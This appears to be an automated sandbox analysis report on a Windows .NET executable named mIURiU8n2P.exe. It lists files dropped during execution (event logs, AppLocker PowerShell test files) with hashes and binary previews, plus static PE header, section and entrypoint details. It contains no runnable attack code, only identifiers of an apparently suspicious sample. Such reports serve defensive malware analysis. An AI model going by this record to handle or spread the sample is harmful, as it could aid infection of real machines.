                                                      Preview:ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.402886152057497
                                                      Encrypted:false
                                                      SSDEEP:768:IHa0Nfa3aXaDaLarazaTaLa3a7aLaza3ana/aXajaTa/aLavababa7afaDaTaTaL:WN
                                                      MD5:D661493496BAE821A563CDA5520A66B3
                                                      SHA1:62CE940CC712CF5E58D4934D7437669F28C57962
                                                      SHA-256:CEE4D2A44ED3F35B5942EA69D15FDC3B37A4D08B5EF7D77BEE583669C6BD36C0
                                                      SHA-512:5E1891166E341A4BDF10BE2FBC982FF8963070CA945FD6F736D1007C9C19EE38060ACCA35A64047FE35BBCCED1EC8146D1DACCA5A7B827A91235813AF817E638
                                                      Malicious:false
                                                      Preview:ElfChnk.........@...............@...............`...A.[V....................................................................I..................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..H............{*...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.3132453844344478
                                                      Encrypted:false
                                                      SSDEEP:384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
                                                      MD5:6237EE0458A0478242B975E9BB7AA97D
                                                      SHA1:6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
                                                      SHA-256:C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
                                                      SHA-512:56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
                                                      Malicious:false
                                                      Preview:ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.325262033408211
                                                      Encrypted:false
                                                      SSDEEP:384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
                                                      MD5:D13189B45679E53F5744A4D449F8B00F
                                                      SHA1:ED410CAB42772E329F656B4793B46AC7159CF05B
                                                      SHA-256:BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
                                                      SHA-512:83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.7947046118743749
                                                      Encrypted:false
                                                      SSDEEP:384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
                                                      MD5:55E73A924B170FBFFF862E8E195E839A
                                                      SHA1:3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
                                                      SHA-256:1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
                                                      SHA-512:E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
                                                      Malicious:false
                                                      Preview:ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):132232
                                                      Entropy (8bit):4.370295335010861
                                                      Encrypted:false
                                                      SSDEEP:384:dORORcxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8R+Pl:dYxA8nPLGb7xA8nPLGbUd
                                                      MD5:5595337EDCADB2DBD966CAC1D5A1354B
                                                      SHA1:BE7C58E6DF4E2FD116F2215198B77B011D3DC5CB
                                                      SHA-256:FD4CEBD864E570F414B2BE882A446924137C6541A0E8F61AD818F760ACAC4EED
                                                      SHA-512:BFC0AAB2C43AC5454DE39ABB31C601A0C601ED1E30CA697B123344BD7499C60025C813AA84B3F2ADEEE282367D517FC4A2A2D66BDB9223CE1DCD44D93632CDEF
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................X...@....5X.....................................................................7.R.....................y.......x..N...........=............................................y..................}y..3...........................................c......xb..f...h.......lc..?.......................h........c......M.......M...F...9c..............................................Qb..............................................A.......i.......................&............x..**................^s...........x68................................................................<.......T...-.!................@..^s....u...X.hM.9..Y..D...\........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......Qb......*...................P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.......w.m.i.p.r.v.s.e...e.x.e...D...".%.P.r.o.g.r.a.m.D.a.t.a.%.\.M.i.c

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.273338343434408
                                                      Encrypted:false
                                                      SSDEEP:384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
                                                      MD5:C37372EB51AEDB4552CB839C7294403A
                                                      SHA1:7B7C408D72B084CE36AA6B623AC6B907FD21D569
                                                      SHA-256:C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
                                                      SHA-512:69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
                                                      Malicious:false
                                                      Preview:ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.231195890775603
                                                      Encrypted:false
                                                      SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
                                                      MD5:3365A34953FD7B16667108A049B64DA5
                                                      SHA1:C72421A58E063D64072152344B266F8306A78702
                                                      SHA-256:AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
                                                      SHA-512:A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
                                                      Malicious:false
                                                      Preview:ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.350713761374238
                                                      Encrypted:false
                                                      SSDEEP:384:dh+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwC:dOqabeGTnbuSxG
                                                      MD5:DDDB6B698BA6FB2ED57468252FC7222B
                                                      SHA1:C3D474F743E406CA375D82D76768F504CF3E09D5
                                                      SHA-256:F21FA2154EB72500790F1F59FEBB757961562D232F206E2F332C4BBBD86D209F
                                                      SHA-512:E97150811CFDF061B2B07CC140D7B08D5B9F11E11AC199029B0A83497EACBA5A78C4B4405F46CB72B9546CA9A7BE1B93CE0BF0B3DF396AD4CE38710EABE86B0D
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................H...x.....e.....................................................................W"r|............................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.421206160086997
                                                      Encrypted:false
                                                      SSDEEP:384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
                                                      MD5:67CAD90771EBC0BD20736201D89C1586
                                                      SHA1:EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
                                                      SHA-256:7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
                                                      SHA-512:27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
                                                      Malicious:false
                                                      Preview:ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Security.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):68120
                                                      Entropy (8bit):4.328728890970768
                                                      Encrypted:false
                                                      SSDEEP:384:ilFRslFRtoaonS6cWNfoLSbdsLSvnQYoxMtg6Wo9MtxLo9MtMozonuoxNo/Vo1+W:Wmza1ZGg6Ur6V8
                                                      MD5:8A8ECCD84253B2E181AE7082A9963F9C
                                                      SHA1:71969E1AFAB903CDA0A9B2BD1D207B27B9F798B4
                                                      SHA-256:1F4930DD01D4D397132DF6B3E522E4359FAFFC33813EBDA133D24A1AE2C79246
                                                      SHA-512:1E8BA76CFA92C70E88B154B4BFD49EF849CBAA0FE152F8A15593E45957E9B890BA91FE7A720912A5BD64CC97F7064810E2861F38D2E75300F42A6E8BF3860161
                                                      Malicious:false
                                                      Preview:ElfChnk.................U.......U....................`.J......................................................................@;....................s...h...............N...=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...........................................................&...................................................................................**......U........`.j...........Wt.&........Wt...wX..9Ck?5.?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                      C:\Windows\System32\winevt\Logs\System.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):74928
                                                      Entropy (8bit):4.368406135879575
                                                      Encrypted:false
                                                      SSDEEP:384:kFRc1tFRc1iKcpIj5dK4hcZGDSND+z6q0Cq1oqQmRtRbR4HeJvGAgXZIpURCOLiU:yYtunLmLQXHmtpJnqiNHpzoQpm5C+
                                                      MD5:C9F435B94734254BE656386AB7DFBEBA
                                                      SHA1:FE90927BFD04C5433E6F63520E4E8DD70628AD1A
                                                      SHA-256:62E43AF089F6B706118188DFB2325CA3B9C467B7854AD51ECD5081EAA15954C8
                                                      SHA-512:FA9980A06C9021960495D6B5D82779D131828F3C5F0CAAABEFD8ED65827BC03CFA9DB13940775ABBA7E0480EB871B3729EA4A1AA45B06EBF9B3E507049E58013
                                                      Malicious:false
                                                      Preview:ElfChnk.................m.......r.....................;z.....................................................................xU.....................s...h...............N...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...........................................................................................................................&...................**......m........`.j...........i.e&........i.e.t.Q...H.C.A;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                      C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):115992
                                                      Entropy (8bit):3.8957449966307878
                                                      Encrypted:false
                                                      SSDEEP:1536:qx6Wl36WlE/s03xuY6WlYXx6Wl36WlE/s03xuY6WlYPU7h02/Xrkczn00B9g:o6Wl36Wlc6Wls6Wl36Wlc6Wlc
                                                      MD5:72D7944BD27F98D070F14BA2490892A0
                                                      SHA1:4D0AB46A4B7897151EE75378FA02BF1B9DA58207
                                                      SHA-256:CFCA10084ED5AF4CC9ED3335609D6DE6EBE1E77EFEB15A1EA936D029CB98F4EC
                                                      SHA-512:7AB2778BA54847D7C4553BCFE4EC5E9BF11E8B58347B846CC9E3239F1F8D13EF4DE6D7822AABA983FB01E6F76D2D92C2F8AA62058A62B342F4A33FF15FAC6286
                                                      Malicious:false
                                                      Preview:ElfChnk.................~.............................H.......................................................................u............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**...3..~.........o...........B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

                                                      C:\Windows\Temp\__PSScriptPolicyTest_k3mktlxl.vwn.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\__PSScriptPolicyTest_qnblsrzc.xue.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):4.011952127732658
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:mIURiU8n2P.exe
                                                      File size:512'512 bytes
                                                      MD5:e1c82191b678cea8f3c996887ddc1232
                                                      SHA1:7946006ca278892817b7a778eea1e04f5b2f948c
                                                      SHA256:bd00a7577088b67b52699f956275a3f563d623ca907feeeaee8d2f821d35de40
                                                      SHA512:cb1499db7c1a7b3c4436d02a1218a055f9c04d7b4ae2ca01fd179a6bdb74c30c8cda1ffda8b61dcc3397b97351b77d683295cb46701a614cf7341906bd807804
                                                      SSDEEP:12288:kU43i+9MrOq5q7pN37VvbvH3pJJtlueGAmp8R6LqSY4JiFZlmM5Ki634:V4JZDhAWS2ZN
                                                      TLSH:5AB428243DFB501AB173EFA69BE8799ADA6FB3733B06641A109103474B13981DEC153E
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..f................................. ........@.. .......................@............@................................

                                                      File Icon

                                                      Icon Hash:90cececece8e8eb0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x47e6ae
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x66E8A53F [Mon Sep 16 21:38:07 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x7e6540x57.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x4de.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x820000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x7c6b40x7c80079d8d818f8056dcb0c8d54db15f7c858False0.47457996046686746data4.010562426386997IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x800000x4de0x600d45abf76ae74238289ede96d0455e824False0.376953125data3.766931639111126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
